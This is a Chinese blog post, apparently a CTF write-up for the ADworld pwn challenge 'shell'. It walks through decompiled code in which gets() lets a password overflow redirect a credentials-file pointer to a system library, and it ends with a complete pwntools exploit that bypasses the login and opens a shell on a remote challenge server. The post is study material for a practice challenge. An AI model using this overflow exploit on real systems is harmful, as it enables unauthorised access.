ADworld pwn wp - shell

最新推荐文章于 2023-04-05 09:39:42 发布
最新推荐文章于 2023-04-05 09:39:42 发布
阅读量109 收藏
点赞数
分类专栏: PWN 文章标签: linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/120086449
版权

前言

非典型题型
相当于登录检测存在逻辑漏洞, 攻击者可以利用文件信息绕过登录
已有shell, 通过已有文件的信息绕过登录检测

分析过程

在这里插入图片描述

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v4; // [rsp+30h] [rbp-C0h]
  const char *v5; // [rsp+38h] [rbp-B8h]
  const char *s2; // [rsp+40h] [rbp-B0h]
  size_t n; // [rsp+48h] [rbp-A8h] BYREF
  __ssize_t v8; // [rsp+50h] [rbp-A0h]
  char *lineptr; // [rsp+58h] [rbp-98h] BYREF
  FILE *stream; // [rsp+60h] [rbp-90h]
  char v11; // [rsp+6Fh] [rbp-81h]
  int v12; // [rsp+70h] [rbp-80h]
  char v13[32]; // [rsp+74h] [rbp-7Ch] BYREF
  char v14[32]; // [rsp+94h] [rbp-5Ch] BYREF
  char v15[36]; // [rsp+B4h] [rbp-3Ch] BYREF
  char *filename; // [rsp+D8h] [rbp-18h]
  const char **v17; // [rsp+E0h] [rbp-10h]
  int v18; // [rsp+E8h] [rbp-8h]
  int v19; // [rsp+ECh] [rbp-4h]

  v19 = 0;
  v18 = argc;
  v17 = argv;
  filename = "creds.txt";
  v12 = 0;
  v11 = 36;
  setvbuf(_bss_start, 0LL, 2, 0LL);
  while ( 1 )
  {
    while ( 1 )
    {
      printf("%c ", (unsigned int)v11);
      gets(v15);
      if ( !strcmp(v15, "login") )
        break;
      v4 = command_get(v15);
      if ( v4 )
      {
        if ( *(_DWORD *)(v4 + 16) != 1 || v12 == 1 )
          (*(void (__fastcall **)(char *, const char *, __int64))(v4 + 8))(v15, "login", v3);
        else
          puts("Permission denied");
      }
      else
      {
        puts("Command not found");
      }
    }
    printf("Username: ");
    gets(v13);
    printf("Password: ");
    gets(v14);
    stream = fopen(filename, "r");
    for ( lineptr = 0LL; ; lineptr = 0LL )
    {
      n = 0LL;
      v8 = getline(&lineptr, &n, stream);
      if ( v8 < 0 )
      {
        free(lineptr);
        goto LABEL_12;
      }
      lineptr[v8 - 1] = 0;
      s2 = strtok(lineptr, ":");
      v5 = strtok(0LL, ":");
      if ( s2 )
      {
        if ( v5 && !strcmp(v13, s2) && !strcmp(v14, v5) )
          break;
      }
      free(lineptr);
    }
    puts("Authenticated!");
    v11 = 35;
    v12 = 1;
LABEL_12:
    if ( v12 != 1 )
      puts("Authentication failed!");
    fclose(stream);
  }
}

发现读取username和password存在栈溢出, 不过主程序是死循环, 退出不了, 所以想靠溢出劫持执行流行不通, 而且还有canary, 所以换一个思路, 发现可以溢出修改filename指针, 如果修改文件指针到ld-linux-x86-64.so.2, 那么可以把用户登陆检测的信息替换为已有的文件中的信息
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

这里的用户登陆检测存在逻辑漏洞, 因为只需要读取文件中":"前后的数据作为username和password, 所以改为ld-linux-x86-64.so.2后, 就可以用这个文件中的字符串作为用户信息登陆
在这里插入图片描述

漏洞利用

写一个提取包含":"的行信息的脚本

import os

f = open("./ld-linux-x86-64.so.2", "r", encoding = "ISO-8859-1")
lines = f.readlines()
for line in lines: 
    if ":" in line: 
        print(line)

在这里插入图片描述

有了"用户信息"就可以完成利用

from pwn import *

url, port = "111.200.241.244", 49274
filename = "./shell"
elf = ELF(filename)
# libc = ELF("")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

debug = 0
if debug:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

io.sendline("login")
io.sendlineafter("Username: ", "zzzz")
payload = cyclic(0x44) + p64(0x0000000000400200)
io.sendlineafter("Password: ", payload)
io.sendlineafter('Authentication failed!','login')
io.sendlineafter('Username: ','relocation processing')  
io.sendlineafter('Password: ',' %s%s')   
io.sendlineafter('Authenticated!','sh')
io.interactive()

总结

审计代码时可以考虑逻辑有无问题

参考

https://blog.csdn.net/seaaseesa/article/details/103199036

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
adworld攻防世界-pwn-新手区-wp
令则
03-05 904
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
Adworld2012互联网营销世界大会PPT下载
07-23
教程名称:       Adworld2012互联网营销世界大会PPT下载【】APPS新媒体运营及营销探索-岳建雄-搜狐【】体育营销动起来-陈鄂-力美【】品牌广告推动移动营销创新-郭伟-安沃传媒【】基于受众的网络广告交易市场-王岳龙-传漾科技【】如何实现In-App广告平台的移动营销价值-谢大新-帷千动媒【】意见领袖:社会化媒体营销催化剂 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
【XCTF-RE】新手练习区-simple-unpack
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ld1cw8
Adworld2009互动营销年度盛典English介绍
09-18
Adworld2009互动营销年度盛典English介绍
adworld-wargame:我对https://adworld.xctf.org.cntask上的pwn挑战的利用
02-13
adworld-wargame 我对上的pwn挑战的利用
ADworldPwn--get_shell
VZZmieshenquan的博客
02-14 2451
Description: 运行就能拿到shell呢,真的 文件:https://adworld.xctf.org.cn/media/task/attachments/get_shell/get_shell Solution: 点击获取在线场景后会给nc链接,之后cat flag即可 Flag: xctf{0f156d10bc369c0208b76f5794b9b86d} ...
ADworld pwn wp - play
fa1c4的blog
09-11 277
前言 一道race condition题目, 双线程共用同一内存就可能有漏洞 分析过程 一个一个函数看, 没啥稀奇的, 直到看到attack函数 int attack() { int result; // eax int v1; // [esp+0h] [ebp-28h] int v2; // [esp+4h] [ebp-24h] int v3; // [esp+8h] [ebp-20h] int v4; // [esp+Ch] [ebp-1Ch] int v5; // [esp+
ADworld pwn wp - onemanarmy
fa1c4的blog
09-18 166
前言 攻防世界的一道large bin,unsorted bin,tcache attack的题目(one man army, 一个人的军队, 看起来很吊) 做到后面的10分题,发现攻防世界的题目环境问题很多啊,不是高分题有多难,而是环境有问题打通了也拿不到flag,或者根本打不通 不过这道题是可以顺利打通的 分析过程 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int v4; // [rsp+Ch] [rbp-24h]
ADworld pwn wp - hacknote
fa1c4的blog
08-30 176
前言 攻防世界的一道pwn, UAF漏洞 https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4717&page=2 分析过程 void __cdecl __noreturn main() { int v0; // eax char buf[4]; // [esp+8h] [ebp-10h] BYREF unsigned int v2; // [esp+Ch] [ebp-Ch
ADworld pwn wp - welpwn
fa1c4的blog
06-26 133
输入没有溢出, 但是复制过程出现了溢出点, 0x400复制到0x10中, 所以可以溢出echo函数, 劫持到ROP泄露puts地址, 找到libc版本, 然后ret2libc. 不过尝试之后发现行不通, 因为复制过程遇到截断符’\0’会停止, 所以直接ROP链会复制不完全, pop_rdi_addr本身就包含了’\0’, 所以可以平衡栈后执行ROP, 这里不一定是在复制完返回地址之后马上截断, 但是8字节地址中包含’\0’, 所以一定会截断, 这里覆盖到的地址是buf的前8个字节, 对ROP没影响,...
Pwn-get_shell-adworld!
最新发布
32bin的博客
04-05 88
题目详情WriteUP上一题下一题随机一题。
ADworld pwn wp - 250
fa1c4的blog
09-12 118
前言 一道非典型栈溢出题目 分析过程 int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp-Ch] [ebp-24h] char v5; // [esp-Ch] [ebp-24h] int v6; // [esp+Ch] [ebp-Ch] BYREF setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0); p
ADworld pwn wp - note-service2
fa1c4的blog
06-26 115
qword_2020A0[v1] = malloc(result);存在数组越界漏洞, 可以借此将特定的指针写到got表里 写入content的处理函数, 最后一个字节会赋值为0, 所以可用的空间是7字节 选择delete会触发free() 整合已有信息: (1) 数组越界漏洞 (2) 一个chunk可以使用7字节 (3) delete选项可以free相应的chunk 利用思路: (1) 申请多个chunk, 分段写入shellcode (2) 利用数组越界修改free的got表项为shellc...
pwntools中fmtstr的使用
fa1c4的blog
02-01 3471
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3186
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
kali安装checksec
fa1c4的blog
01-26 3024
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3011
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2861
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值